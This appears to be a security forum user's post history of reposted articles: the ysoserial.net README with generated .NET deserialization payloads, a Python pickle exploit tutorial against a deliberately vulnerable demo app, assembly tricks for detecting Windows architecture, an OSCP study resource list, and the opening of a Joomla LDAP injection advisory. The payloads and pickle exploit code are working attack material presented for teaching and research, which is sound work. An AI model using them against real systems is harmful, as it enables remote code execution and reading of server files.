Everything posted by Nytro

  1. ysoserial.net

     A proof-of-concept tool for generating payloads that exploit unsafe .NET object deserialization.

     Description

     ysoserial.net is a collection of utilities and property-oriented programming "gadget chains" discovered in common .NET libraries that can, under the right conditions, exploit .NET applications performing unsafe deserialization of objects. The main driver program takes a user-specified command and wraps it in the user-specified gadget chain, then serializes these objects to stdout. When an application with the required gadgets on the classpath unsafely deserializes this data, the chain is automatically invoked and causes the command to be executed on the application host.

     It should be noted that the vulnerability lies in the application performing unsafe deserialization, NOT in having gadgets on the classpath.

     This project is inspired by Chris Frohoff's ysoserial project.

     Disclaimer

     This software has been created purely for the purposes of academic research and for the development of effective defensive techniques, and is not intended to be used to attack systems except where explicitly authorized. Project maintainers are not responsible or liable for misuse of the software. Use responsibly. This software is a personal project and is not affiliated with any company, including the project owner's and contributors' employers.

     Usage

     $ ./ysoserial -h
     ysoserial.net generates deserialization payloads for a variety of .NET formatters.

     Available gadgets:
     - ActivitySurrogateSelector (gadget by James Forshaw; ignores the command parameter and executes the constructor of the ExploitClass class). Formatters: BinaryFormatter, ObjectStateFormatter, SoapFormatter, LosFormatter
     - ObjectDataProvider (gadget by Oleksandr Mirosh and Alvaro Munoz). Formatters: Json.Net, FastJson, JavaScriptSerializer
     - PSObject (gadget by Oleksandr Mirosh and Alvaro Munoz; the target must run a system not patched for CVE-2017-8565, published 07/11/2017). Formatters: BinaryFormatter, ObjectStateFormatter, SoapFormatter, NetDataContractSerializer, LosFormatter
     - TypeConfuseDelegate (gadget by James Forshaw). Formatters: BinaryFormatter, ObjectStateFormatter, NetDataContractSerializer, LosFormatter

     Usage: ysoserial.exe [options]
     Options:
       -o, --output=VALUE     the output format (raw|base64).
       -g, --gadget=VALUE     the gadget chain.
       -f, --formatter=VALUE  the formatter.
       -c, --command=VALUE    the command to be executed.
       -t, --test             whether to run the payload locally. Default: false
       -h, --help             show this message and exit

     Examples

     $ ./ysoserial.exe -f Json.Net -g ObjectDataProvider -o raw -c "calc" -t
     {
       '$type':'System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35',
       'MethodName':'Start',
       'MethodParameters':{
         '$type':'System.Collections.ArrayList, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089',
         '$values':['cmd','/c calc']
       },
       'ObjectInstance':{'$type':'System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089'}
     }

     $ ./ysoserial.exe -f BinaryFormatter -g PSObject -o base64 -c "calc" -t
AAEAAAD/////AQAAAAAAAAAMAgAAAF9TeXN0ZW0uTWFuYWdlbWVudC5BdXRvbWF0aW9uLCBWZXJzaW9uPTMuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49MzFiZjM4NTZhZDM2NGUzNQUBAAAAJVN5c3RlbS5NYW5hZ2VtZW50LkF1dG9tYXRpb24uUFNPYmplY3QBAAAABkNsaVhtbAECAAAABgMAAACJFQ0KPE9ianMgVmVyc2lvbj0iMS4xLjAuMSIgeG1sbnM9Imh0dHA6Ly9zY2hlbWFzLm1pY3Jvc29mdC5jb20vcG93ZXJzaGVsbC8yMDA0LzA0Ij4mI3hEOw0KPE9iaiBSZWZJZD0iMCI+JiN4RDsNCiAgICA8VE4gUmVmSWQ9IjAiPiYjeEQ7DQogICAgICA8VD5NaWNyb3NvZnQuTWFuYWdlbWVudC5JbmZyYXN0cnVjdHVyZS5DaW1JbnN0YW5jZSNTeXN0ZW0uTWFuYWdlbWVudC5BdXRvbWF0aW9uL1J1bnNwYWNlSW52b2tlNTwvVD4mI3hEOw0KICAgICAgPFQ+TWljcm9zb2Z0Lk1hbmFnZW1lbnQuSW5mcmFzdHJ1Y3R1cmUuQ2ltSW5zdGFuY2UjUnVuc3BhY2VJbnZva2U1PC9UPiYjeEQ7DQogICAgICA8VD5NaWNyb3NvZnQuTWFuYWdlbWVudC5JbmZyYXN0cnVjdHVyZS5DaW1JbnN0YW5jZTwvVD4mI3hEOw0KICAgICAgPFQ+U3lzdGVtLk9iamVjdDwvVD4mI3hEOw0KICAgIDwvVE4+JiN4RDsNCiAgICA8VG9TdHJpbmc+UnVuc3BhY2VJbnZva2U1PC9Ub1N0cmluZz4mI3hEOw0KICAgIDxPYmogUmVmSWQ9IjEiPiYjeEQ7DQogICAgICA8VE5SZWYgUmVmSWQ9IjAiIC8+JiN4RDsNCiAgICAgIDxUb1N0cmluZz5SdW5zcGFjZUludm9rZTU8L1RvU3RyaW5nPiYjeEQ7DQogICAgICA8UHJvcHM+JiN4RDsNCiAgICAgICAgPE5pbCBOPSJQU0NvbXB1dGVyTmFtZSIgLz4mI3hEOw0KCQk8T2JqIE49InRlc3QxIiBSZWZJZCA9IjIwIiA+ICYjeEQ7DQogICAgICAgICAgPFROIFJlZklkPSIxIiA+ICYjeEQ7DQogICAgICAgICAgICA8VD5TeXN0ZW0uV2luZG93cy5NYXJrdXAuWGFtbFJlYWRlcltdLCBQcmVzZW50YXRpb25GcmFtZXdvcmssIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj0zMWJmMzg1NmFkMzY0ZTM1PC9UPiYjeEQ7DQogICAgICAgICAgICA8VD5TeXN0ZW0uQXJyYXk8L1Q+JiN4RDsNCiAgICAgICAgICAgIDxUPlN5c3RlbS5PYmplY3Q8L1Q+JiN4RDsNCiAgICAgICAgICA8L1ROPiYjeEQ7DQogICAgICAgICAgPExTVD4mI3hEOw0KICAgICAgICAgICAgPFMgTj0iSGFzaCIgPiAgDQoJCSZsdDtSZXNvdXJjZURpY3Rpb25hcnkNCiAgeG1sbnM9Imh0dHA6Ly9zY2hlbWFzLm1pY3Jvc29mdC5jb20vd2luZngvMjAwNi94YW1sL3ByZXNlbnRhdGlvbiINCiAgeG1sbnM6eD0iaHR0cDovL3NjaGVtYXMubWljcm9zb2Z0LmNvbS93aW5meC8yMDA2L3hhbWwiDQogIHhtbG5zOlN5c3RlbT0iY2xyLW5hbWVzcGFjZTpTeXN0ZW07YXNzZW1ibHk9bXNjb3JsaWIiDQogIHhtbG5zOkRpYWc9ImNsci1uYW1lc3BhY2U6U3lzdGVtLkRpYWdub3N0aWNzO2Fzc2VtYmx5PXN5c3RlbSImZ3Q7DQoJICZs
dDtPYmplY3REYXRhUHJvdmlkZXIgeDpLZXk9IkxhdW5jaENhbGMiIE9iamVjdFR5cGUgPSAieyB4OlR5cGUgRGlhZzpQcm9jZXNzfSIgTWV0aG9kTmFtZSA9ICJTdGFydCIgJmd0Ow0KICAgICAmbHQ7T2JqZWN0RGF0YVByb3ZpZGVyLk1ldGhvZFBhcmFtZXRlcnMmZ3Q7DQogICAgICAgICZsdDtTeXN0ZW06U3RyaW5nJmd0O2NtZCZsdDsvU3lzdGVtOlN0cmluZyZndDsNCiAgICAgICAgJmx0O1N5c3RlbTpTdHJpbmcmZ3Q7L2MgImNhbGMiICZsdDsvU3lzdGVtOlN0cmluZyZndDsNCiAgICAgJmx0Oy9PYmplY3REYXRhUHJvdmlkZXIuTWV0aG9kUGFyYW1ldGVycyZndDsNCiAgICAmbHQ7L09iamVjdERhdGFQcm92aWRlciZndDsNCiZsdDsvUmVzb3VyY2VEaWN0aW9uYXJ5Jmd0Ow0KCQkJPC9TPiYjeEQ7DQogICAgICAgICAgPC9MU1Q+JiN4RDsNCiAgICAgICAgPC9PYmo+JiN4RDsNCiAgICAgIDwvUHJvcHM+JiN4RDsNCiAgICAgIDxNUz4mI3hEOw0KICAgICAgICA8T2JqIE49Il9fQ2xhc3NNZXRhZGF0YSIgUmVmSWQgPSIyIj4gJiN4RDsNCiAgICAgICAgICA8VE4gUmVmSWQ9IjEiID4gJiN4RDsNCiAgICAgICAgICAgIDxUPlN5c3RlbS5Db2xsZWN0aW9ucy5BcnJheUxpc3Q8L1Q+JiN4RDsNCiAgICAgICAgICAgIDxUPlN5c3RlbS5PYmplY3Q8L1Q+JiN4RDsNCiAgICAgICAgICA8L1ROPiYjeEQ7DQogICAgICAgICAgPExTVD4mI3hEOw0KICAgICAgICAgICAgPE9iaiBSZWZJZD0iMyI+ICYjeEQ7DQogICAgICAgICAgICAgIDxNUz4mI3hEOw0KICAgICAgICAgICAgICAgIDxTIE49IkNsYXNzTmFtZSI+UnVuc3BhY2VJbnZva2U1PC9TPiYjeEQ7DQogICAgICAgICAgICAgICAgPFMgTj0iTmFtZXNwYWNlIj5TeXN0ZW0uTWFuYWdlbWVudC5BdXRvbWF0aW9uPC9TPiYjeEQ7DQogICAgICAgICAgICAgICAgPE5pbCBOPSJTZXJ2ZXJOYW1lIiAvPiYjeEQ7DQogICAgICAgICAgICAgICAgPEkzMiBOPSJIYXNoIj40NjA5MjkxOTI8L0kzMj4mI3hEOw0KICAgICAgICAgICAgICAgIDxTIE49Ik1pWG1sIj4gJmx0O0NMQVNTIE5BTUU9IlJ1bnNwYWNlSW52b2tlNSIgJmd0OyZsdDtQUk9QRVJUWSBOQU1FPSJ0ZXN0MSIgVFlQRSA9InN0cmluZyIgJmd0OyZsdDsvUFJPUEVSVFkmZ3Q7Jmx0Oy9DTEFTUyZndDs8L1M+JiN4RDsNCiAgICAgICAgICAgICAgPC9NUz4mI3hEOw0KICAgICAgICAgICAgPC9PYmo+JiN4RDsNCiAgICAgICAgICA8L0xTVD4mI3hEOw0KICAgICAgICA8L09iaj4mI3hEOw0KICAgICAgPC9NUz4mI3hEOw0KICAgIDwvT2JqPiYjeEQ7DQogICAgPE1TPiYjeEQ7DQogICAgICA8UmVmIE49Il9fQ2xhc3NNZXRhZGF0YSIgUmVmSWQgPSIyIiAvPiYjeEQ7DQogICAgPC9NUz4mI3hEOw0KICA8L09iaj4mI3hEOw0KPC9PYmpzPgs= Contributing Fork it Create your feature branch (git checkout -b my-new-feature) Commit your changes (git commit -am 'Add some feature') Push to the 
branch (git push origin my-new-feature) Create a new Pull Request

     Additional Reading
     - Are you my Type?
     - Friday the 13th: JSON Attacks - Slides
     - Friday the 13th: JSON Attacks - Whitepaper
     - Exploiting .NET Managed DCOM

     Source: https://github.com/pwntester/ysoserial.net
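     As a quick sanity check of what the base64 output above contains (my own sketch, not part of ysoserial.net): a BinaryFormatter stream begins with a SerializationHeaderRecord, i.e. record type byte 0x00, a root id, and a header id of -1 (0xFFFFFFFF). The helper name below is hypothetical.

```python
import base64

# Minimal sketch: decode a base64 payload and check whether it looks
# like a BinaryFormatter stream. Such streams start with record type
# 0x00 followed by an int32 root id and an int32 header id of -1.
def looks_like_binaryformatter(b64_payload):
    raw = base64.b64decode(b64_payload)
    return raw[:1] == b"\x00" and raw[5:9] == b"\xff\xff\xff\xff"

# First bytes of the PSObject example payload above:
print(looks_like_binaryformatter("AAEAAAD/////AQAAAAAAAAAMAgAAAF9T"))  # True
```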
  2. Explaining and exploiting deserialization vulnerability with Python (EN)

     Sat 23 September 2017, Dan Lousqui

     Deserialization?

     Even though it was present neither in the OWASP TOP 10 2013 nor in the OWASP TOP 10 2017 RC1, deserialization of untrusted data is a very serious vulnerability that we see more and more often in current security disclosures. Serialization and deserialization are mechanisms used in many environments (web, mobile, IoT, ...) when you need to convert any object (an OOM, an array, a dictionary, a file descriptor, ... anything) into something that you can put "outside" of your application (network, file system, database, ...). The conversion works in both directions, which is very convenient if you need to save or transfer data (e.g. sharing the status of a game in a multiplayer game, or creating an "export" / "backup" file in a project). However, we will see in this article how this kind of behavior can be very dangerous... and therefore why I think this vulnerability will be present in OWASP TOP 10 2017 RC2.

     In Python?

     With Python, the default library used to serialize and deserialize objects is pickle. It is a really easy-to-use library (compared to something like sqlite3) and very convenient if you need to persist data. For example, if you want to save objects:

     import pickle
     import datetime

     my_data = {}
     my_data['last-modified'] = str(datetime.datetime.now())
     my_data['friends'] = ["alice", "bob"]
     pickle_data = pickle.dumps(my_data)
     with open("backup.data", "wb") as file:
         file.write(pickle_data)

     That will create a backup.data file with the following content:

     last-modifiedqX2017-09-23 00:23:29.986499qXfriendsq]q(XaliceqXbobqeu.

     And if you want to retrieve your data with Python, it's easy:

     import pickle

     with open("backup.data", "rb") as file:
         pickle_data = file.read()
     my_data = pickle.loads(pickle_data)
     my_data
     # {'friends': ['alice', 'bob'], 'last-modified': '2001-01-01 01:02:03.456789'}

     Awesome, isn't it?

     Introducing... Pickle pRick!
     In order to illustrate the awesomeness of pickle in terms of insecurity, I developed a vulnerable application. You can retrieve it in the TheBlusky/pickle-prick repository. As always with my Docker projects, just execute the build.sh or build.bat script, and the vulnerable project will be launched.

     This application is for Ricks, from the Rick and Morty TV show. For those who don't know the show (shame...), Rick is a genius scientist who travels between universes and planets for great adventures with his grandson Morty. The show involves many multiverse and time-travel dilemmas. Each universe has its own Rick, so I developed an application for every Rick, so that they can trace their adventures by storing when, where and with whom they travelled. Every Rick must be able to use the application, and the data should never be stored on the server, so one Rick cannot see the data of other Ricks. To make that possible, a Rick can export his agenda into a pickle_rick.data file that can be imported later. Obviously, this application is vulnerable (Rick would not offer other Ricks this kind of gift without a backdoor...). If you don't want to be spoiled and want to play a little game, you should stop reading this article, launch the application (locally), and try to pwn it (without looking at the exploit folder, obviously...).

     What's wrong with Pickle?

     pickle (like many other serialization / deserialization libraries) provides a way to execute arbitrary commands, even if few developers know it. To do so, you simply have to create an object that implements a __reduce__(self) method. This method should return a tuple whose first element is a callable and whose second element is a tuple of arguments. The callable will be executed with those arguments, and the result will be the "unserialization" of the object.
     For example, if you save the following pickle object:

     import pickle
     import os

     class EvilPickle(object):
         def __reduce__(self):
             return (os.system, ('echo Powned', ))

     pickle_data = pickle.dumps(EvilPickle())
     with open("backup.data", "wb") as file:
         file.write(pickle_data)

     and then later try to deserialize the object:

     import pickle

     with open("backup.data", "rb") as file:
         pickle_data = file.read()
     my_data = pickle.loads(pickle_data)

     then "Powned" will be displayed by the loads function, as echo Powned is executed. It's easy to imagine what we can do with such a powerful vulnerability.

     The exploit

     In the pickle-prick application, pickle is used in order to retrieve all adventures:

     async def do_import(request):
         session = await get_session(request)
         data = await request.post()
         try:
             pickle_prick = data['file'].file.read()
         except:
             session['errors'] = ["Couldn't read pickle prick file."]
             return web.HTTPFound('/')
         prick = base64.b64decode(pickle_prick.decode())
         session['adventures'] = [i for i in pickle.loads(prick)]
         return web.HTTPFound('/')

     So if we upload a malicious pickle, it will be executed. However, if we want to be able to read the result of the code execution, the __reduce__ callable must return an object that matches the adventures signature (an array of dictionaries, each having a date, a universe, a planet and a morty). To achieve that, we will use the vulnerability twice: a first time to upload malicious Python code, and a second time to execute it.

     1. Generating a payload to generate a payload

     We want to upload a Python file that contains a callable that matches the adventures signature and will be executed on the server.
     Let's write an evil_rick_shell.py file with such code:

     def do_evil():
         with open("/etc/passwd") as f:
             data = f.readlines()
         return [{"date": line, "dimension": "//", "planet": "//", "morty": "//"} for line in data]

     Now, let's create a pickle that will write this file on the server:

     import pickle
     import base64
     import os

     class EvilRick1(object):
         def __reduce__(self):
             with open("evil_rick_shell.py") as f:
                 data = f.readlines()
             shell = "\n".join(data)
             return os.system, ("echo '{}' > evil_rick_shell.py".format(shell),)

     prick = pickle.dumps(EvilRick1())
     if os.name == 'nt':  # Windows trick
         prick = prick[0:3] + b"os" + prick[5:]
     pickle_prick = base64.b64encode(prick).decode()
     with open("evil_rick1.data", "w") as file:
         file.write(pickle_prick)

     This pickle file will trigger an echo '{payload}' > evil_rick_shell.py command on the server, so the payload will be installed. As the os.system callable does not match the adventures signature, uploading evil_rick1.data will return a 500 error, but by then it is too late for any security.

     2. Generating a payload to execute a payload

     Now let's create a pickle object that will call the evil_rick_shell.do_evil callable:

     import pickle
     import base64
     import evil_rick_shell

     class EvilRick2(object):
         def __reduce__(self):
             return evil_rick_shell.do_evil, ()

     prick = pickle.dumps(EvilRick2())
     pickle_prick = base64.b64encode(prick).decode()
     with open("evil_rick2.data", "w") as file:
         file.write(pickle_prick)

     As the evil_rick_shell.do_evil callable matches the adventures signature, uploading evil_rick2.data will be fine and will add each line of the /etc/passwd file as an adventure.

     Build it all together

     Once both payloads are generated, simply upload the first one, then the second one, and you should see this amazing screen: the do_evil() payload has been triggered, and the content of the /etc/passwd file is displayed.
     Even though the content of this file is not (really) sensitive, it's quite easy to imagine something more evil being executed on Rick's server.

     How to protect against it

     It's simple... don't use pickle (or any other "wannabe" universal and automatic serializer) if you are going to parse untrusted data with it. It's not that hard to write your own convert_data_to_string(data) and convert_string_to_data(string) functions that won't be able to interpret forged objects with malicious code within.

     I hope you enjoyed this article; have fun with it!

     Dan Lousqui, IT Security Senior Consultant, developer, open source enthusiast, and so much more!

     Source: https://dan.lousqui.fr/explaining-and-exploiting-deserialization-vulnerability-with-python-en.html
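     The article's protection advice can be sketched with the standard json module (my example, not the author's code): json.loads only ever reconstructs plain data types (dicts, lists, strings, numbers, booleans), so a forged payload has no callable to hijack, unlike pickle.

```python
import json

# A data-only serializer in the spirit of the article's advice:
# json reconstructs only plain data, never arbitrary objects,
# so there is no __reduce__-style code-execution hook.
def convert_data_to_string(data):
    return json.dumps(data)

def convert_string_to_data(string):
    return json.loads(string)

backup = convert_data_to_string({"friends": ["alice", "bob"]})
restored = convert_string_to_data(backup)
print(restored)  # {'friends': ['alice', 'bob']}
```

     The trade-off is that only plain data survives the round trip; anything richer must be converted explicitly, which is exactly what keeps untrusted input from smuggling in behavior.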
  3. WinDbg Preview

     IMPORTANT: This app works with Windows 10 Pro and Home but not with Windows 10 S.

     We've updated WinDbg to have more modern visuals, faster windows, a full-fledged scripting experience, and Time Travel Debugging, all with the easily extensible debugger data model front and center. WinDbg Preview uses the same underlying engine as today's WinDbg, so all the commands, extensions, and workflows you're used to will still work as they did before. See http://aka.ms/windbgblog and https://go.microsoft.com/fwlink/p/?linkid=854349 for more information!

     Source: https://www.microsoft.com/en-us/store/p/windbg-preview/9pgjgd53tn86
  4. Detecting Architecture in Windows

     September 24, 2017

     After a while, I thought of posting something interesting I noticed. Some of you know this old method of detecting the architecture using the CS segment register. It was also used in the Kronos malware:

     xor eax, eax
     mov ax, cs
     shr eax, 5

     I had a look at the segment registers last night and found out that we can use the ES, GS and FS segment registers for detecting the architecture as well.

     Using ES

     ; Author : @OsandaMalith
     main:
         xor eax, eax
         mov ax, es
         ror ax, 0x3
         and eax, 0x1
         test eax, eax
         je thirtytwo
         invoke MessageBox, 0, 'You are Running 64-bit', 'Architecture', MB_OK + MB_ICONINFORMATION
         jmp exit
     thirtytwo:
         invoke MessageBox, 0, 'You are Running 32-bit', 'Architecture', MB_OK + MB_ICONINFORMATION
     exit:
         invoke ExitProcess, 0

     Using GS

     ; Author : @OsandaMalith
     main:
         xor eax, eax
         mov eax, gs
         test eax, eax
         je thirtytwo
         invoke MessageBox, 0, 'You are Running 64-bit', 'Architecture', MB_OK + MB_ICONINFORMATION
         jmp exit
     thirtytwo:
         invoke MessageBox, 0, 'You are Running 32-bit', 'Architecture', MB_OK + MB_ICONINFORMATION
     exit:
         invoke ExitProcess, 0
     .end main

     Using TEB

     Apart from that, you can also use the TEB entry at offset 0xc0, which is 'WOW32Reserved'.

     ; Author : @OsandaMalith
     main:
         xor eax, eax
         mov eax, [FS:0xc0]
         test eax, eax
         je thirtytwo
         invoke MessageBox, 0, 'You are Running 64-bit', 'Architecture', MB_OK + MB_ICONINFORMATION
         jmp exit
     thirtytwo:
         invoke MessageBox, 0, 'You are Running 32-bit', 'Architecture', MB_OK + MB_ICONINFORMATION
     exit:
         invoke ExitProcess, 0
     .end main

     I included them all in one and coded a small C application. I'm sure there are many other tricks to detect the architecture.
     This might come in handy in shellcoding.

     #include <Windows.h>
     #include <wchar.h>
     /*
      * Author: Osanda Malith Jayathissa - @OsandaMalith
      * Website: https://osandamalith.com
      * Description: Few tricks that you can use to detect the architecture in Windows
      * Link: http://osandamalith.com/2017/09/24/detecting-architecture-in-windows/
      */

     BOOL detectArch_ES() {
     #if defined(_MSC_VER)
         _asm {
             xor eax, eax
             mov ax, es
             ror ax, 0x3
             and eax, 0x1
         }
     #elif defined(__GNUC__)
         asm(
             ".intel_syntax noprefix;"
             "xor eax, eax;"
             "mov ax, es;"
             "ror ax, 0x3;"
             "and eax, 0x1;"
         );
     #endif
     }

     BOOL detectArch_GS() {
     #if defined(_MSC_VER)
         _asm {
             xor eax, eax
             mov ax, gs
         }
     #elif defined(__GNUC__)
         asm(
             ".intel_syntax noprefix;"
             "xor eax, eax;"
             "mov ax, gs;"
         );
     #endif
     }

     BOOL detectArch_TEB() {
     #if defined(_MSC_VER)
         _asm {
             xor eax, eax
             mov eax, fs:[0xc0]
         }
     #elif defined(__GNUC__)
         asm(
             ".intel_syntax noprefix;"
             "xor eax, eax;"
             "mov eax, fs:[0xc0];"
         );
     #endif
     }

     int main(int argc, char* argv[]) {
         wprintf(!detectArch_ES()  ? L"You are Running 32-bit\n" : L"You are Running 64-bit\n");
         wprintf(!detectArch_GS()  ? L"You are Running 32-bit\n" : L"You are Running 64-bit\n");
         wprintf(!detectArch_TEB() ? L"You are Running 32-bit\n" : L"You are Running 64-bit\n");
         return 1337;
     }

     Source: https://osandamalith.com/2017/09/24/detecting-architecture-in-windows/
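     For comparison (my own sketch, not from the post): from Python, the bitness of the current process can be read portably from the pointer size, the same 32- vs 64-bit distinction the segment-register tricks above infer for a Windows process.

```python
import struct

# Pointer size of the running interpreter: 4 bytes in a 32-bit
# process, 8 bytes in a 64-bit one. Unlike the assembly tricks,
# this only tells you about the current process, not the OS.
def detect_arch():
    bits = struct.calcsize("P") * 8
    return "You are Running {}-bit".format(bits)

print(detect_arch())
```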
  5. OSCP Certification

     by ciaranmcnally

     Having worked in information security for the past few years, I am well aware of the different certifications available as a means of professional development. The certification that stood out as earning the most respect from the security community seemed to be the Offensive Security Certified Professional (OSCP) certificate; I witnessed this time and time again in conversations online. The reason often given is that it is a tough 24-hour practical exam rather than a multiple-choice questionnaire like many other security certificates. The OSCP is also listed regularly as a desirable requirement for many different kinds of infosec engineering jobs. I recently received confirmation that I have successfully achieved this certification.

     To anyone interested in pursuing the OSCP, I would completely encourage it. There is no way you can come away from this experience without adding a few new tricks or tools to your security skills arsenal, and aside from all of that, it's also very fun. This certificate will demonstrate to clients or to any potential employer that you have a good, wide understanding of penetration testing with a practical skill-set to back up the knowledge. I wanted to get it because I've had clients in the past not follow up on using my services due to my not having any official security certificates (especially CREST-craving UK-based customers). Hopefully this opens some doors to new customers. Before undertaking this course, I already had a lot of experience performing vulnerability assessments and penetration tests; I also had a few CVEs under my belt and have been quite active in the wider information security community by creating tools, taking part in bug bounties, and being a fan of responsible disclosure in general. I found the challenge presented by this exam to be quite humbling and very much a worthwhile engagement.
     I would describe the "hacking with Kali" course materials and videos as very entry-level friendly, which is perfect for someone with a keen interest looking to learn the basics of penetration testing. The most valuable part of the course for those already familiar with the basics is the interactive lab environment; it is an amazing experience, and it's hard not to get excited thinking about it. There were moments of frustration and teeth-grinding, but it was a very enjoyable way to sharpen skills and try out new techniques and tools.

     I initially signed up for the course a full year ago while working full time on contracts and found it extremely difficult to find the time to work on the labs, as I had multiple ongoing projects and was doing bug bounties quite actively too. I burnt out fairly quickly and didn't concentrate on it at all. I did one or two of the "known to be hard" machines in the labs fairly easily, which convinced me I was ready, and I sat the exam having compromised fewer than 10 of the lab hosts. This was of course silly; I only managed two roots and one local-access shell, which was nowhere near enough points to pass and very much dulled my arrogance at the time. I didn't submit an exam report and decided to focus on my contracts and dedicate my time to the labs properly at a later date.

     Fast forward over a year, to the start of this month (September): I had two weeks free that I couldn't get contract work for, so I purchased a lab extension with the full intention of dedicating my time completely to obtaining this certificate. In those two weeks I got around 20 or so lab machines and set the date for my first real exam attempt. It went well, but I didn't quite make it over the line: I rooted three machines and fell short of privilege escalation on a fourth Windows host. I was so close, and possibly could have passed if I had done the lab report and exercises; however, this time around I wasn't upset by the failure and became more determined than ever to keep trying.
     I booked another two weeks in the labs, focused on machines requiring manual Windows privilege escalation, and booked my next exam sitting, successfully nailing it. As I had learned a lot of penetration testing skills doing bug bounties, I found it very easy to identify and gain remote access to the lab machines; I usually gained remote shell access within the first 20 or 30 minutes for the large majority of the attempted targets. I very quickly found out that my weakest area was local privilege escalation. During my contract engagements, it is a regular occurrence that my clients request I not escalate any further once I have remote code execution on a live production environment. This activity is also greatly discouraged in bug bounties, so I can very much see why I didn't have much skill in this area. The OSCP lab environment taught me a large number of techniques and different ways of accomplishing this; I feel I have massively skilled up with regard to privilege escalation on Linux and Windows hosts.

     I'm very happy to join the ranks of Offensive Security Certified Professionals and would like to thank everyone who helped me on this journey by providing me with links to quality material produced by the finest of hackers. Keeping the hacker knowledge-sharing mantra in mind, below is a categorized list of very useful resources I used during my journey to certification. I hope these help you to overcome many obstacles by trying harder!
     Mixed
     https://www.nop.cat/nmapscans/
     https://github.com/1N3/PrivEsc
     https://github.com/xapax/oscp/blob/master/linux-template.md
     https://github.com/xapax/oscp/blob/master/windows-template.md
     https://github.com/slyth11907/Cheatsheets
     https://github.com/erik1o6/oscp/
     https://backdoorshell.gitbooks.io/oscp-useful-links/content/
     https://highon.coffee/blog/lord-of-the-root-walkthrough/

     MsfVenom
     https://www.offensive-security.com/metasploit-unleashed/msfvenom/
     https://netsec.ws/?p=331

     Shell Escape Techniques
     https://netsec.ws/?p=337
     https://pen-testing.sans.org/blog/2012/06/06/escaping-restricted-linux-shells
     https://airnesstheman.blogspot.ca/2011/05/breaking-out-of-jail-restricted-shell.html
     https://speakerdeck.com/knaps/escape-from-shellcatraz-breaking-out-of-restricted-unix-shells

     Pivoting
     http://www.fuzzysecurity.com/tutorials/13.html
     http://exploit.co.il/networking/ssh-tunneling/
     https://www.sans.org/reading-room/whitepapers/testing/tunneling-pivoting-web-application-penetration-testing-36117
     https://highon.coffee/blog/ssh-meterpreter-pivoting-techniques/
     https://www.offensive-security.com/metasploit-unleashed/portfwd/

     Linux Privilege Escalation
     https://0x90909090.blogspot.ie/2015/07/no-one-expect-command-execution.html
     https://resources.infosecinstitute.com/privilege-escalation-linux-live-examples/#gref
     https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/
     https://github.com/mzet-/linux-exploit-suggester
     https://github.com/SecWiki/linux-kernel-exploits
     https://highon.coffee/blog/linux-commands-cheat-sheet/
     https://www.defensecode.com/public/DefenseCode_Unix_WildCards_Gone_Wild.txt
     https://github.com/lucyoa/kernel-exploits
     https://www.rebootuser.com/?p=1758
     https://www.securitysift.com/download/linuxprivchecker.py
     https://www.youtube.com/watch?v=dk2wsyFiosg
     https://www.youtube.com/watch?v=2NMB-pfCHT8
     https://www.youtube.com/watch?v=1A7yJxh-fyc
     https://blog.cobaltstrike.com/2014/03/20/user-account-control-what-penetration-testers-should-know/
     Windows Privilege Escalation
     https://github.com/foxglovesec/RottenPotato
     https://github.com/GDSSecurity/Windows-Exploit-Suggester/blob/master/windows-exploit-suggester.py
     https://github.com/pentestmonkey/windows-privesc-check
     https://github.com/PowerShellMafia/PowerSploit
     https://github.com/rmusser01/Infosec_Reference/blob/master/Draft/ATT%26CK-Stuff/Windows/Windows_Privilege_Escalation.md
     https://github.com/SecWiki/windows-kernel-exploits
     https://hackmag.com/security/elevating-privileges-to-administrative-and-further/
     https://pentest.blog/windows-privilege-escalation-methods-for-pentesters/
     https://toshellandback.com/2015/11/24/ms-priv-esc/
     https://www.gracefulsecurity.com/privesc-unquoted-service-path/
     https://www.commonexploits.com/unquoted-service-paths/
     https://www.exploit-db.com/dll-hijacking-vulnerable-applications/
     https://www.youtube.com/watch?v=kMG8IsCohHA&feature=youtu.be

     Source: https://securit.ie/blog/?p=70
  6. I don't know who they are and I haven't heard of them, but since it's free and they have nothing to gain (only donations), it seems like an OK idea to me.
  7. It happens; it's not that serious, I think.
  8. What haters you are; these people are trying to build something useful. Wait until filelist goes down and you'll see how much you'll be looking for this...
  9. NetRipper now supports SSL hooking for the latest Chrome x64 version: https://github.com/NytroRST/NetRipper/
  10. Joomla! 3.7.5 - Takeover in 20 Seconds with LDAP Injection

     20 Sep 2017, by Dr. Johannes Dahse, Robin Peraglie

     With over 84 million downloads, Joomla! is one of the most popular content management systems on the World Wide Web. It powers about 3.3% of all websites' content and articles. Our code analysis solution RIPS detected a previously unknown LDAP injection vulnerability in the login controller. This single vulnerability could allow remote attackers to leak the super user password with blind injection techniques and to fully take over, within seconds, any Joomla! <= 3.7.5 installation that uses LDAP for authentication. Joomla! has fixed the vulnerability in the latest version 3.8.

     Requirements - Who is affected

     Installations with the following requirements are affected by this vulnerability:
     - Joomla! version 1.5 <= 3.7.5 is installed
     - Joomla! is configured to use LDAP for authentication

     This is not a configuration flaw, and an attacker does not need any privileges to exploit this vulnerability.

     Impact - What can an attacker do

     By exploiting a vulnerability in the login page, an unprivileged remote attacker can efficiently extract all authentication credentials of the LDAP server that is used by the Joomla! installation. These include the username and password of the super user, the Joomla! administrator. An attacker can then use the hijacked information to log in to the administrator control panel and to take over the Joomla! installation, as well as potentially the web server, by uploading custom Joomla! extensions for remote code execution.

     Vulnerability Analysis - CVE-2017-14596

     Our code analysis solution RIPS automatically identified the vulnerability, which spans the following nested code lines. First, in the LoginController, the Joomla! application receives the user-supplied credentials from the login form.
     /administrator/components/com_login/controller.php

     class LoginController extends JControllerLegacy
     {
         public function login()
         {
             ⋮
             $app = JFactory::getApplication();
             ⋮
             $model = $this->getModel('login');
             $credentials = $model->getState('credentials');
             ⋮
             $app->login($credentials, array('action' => 'core.login.admin'));
         }
     }

     The credentials are passed on to the login method, which then invokes the authenticate method.

     /libraries/cms/application/cms.php

     class JApplicationCms extends JApplicationWeb
     {
         public function login($credentials, $options = array())
         {
             ⋮
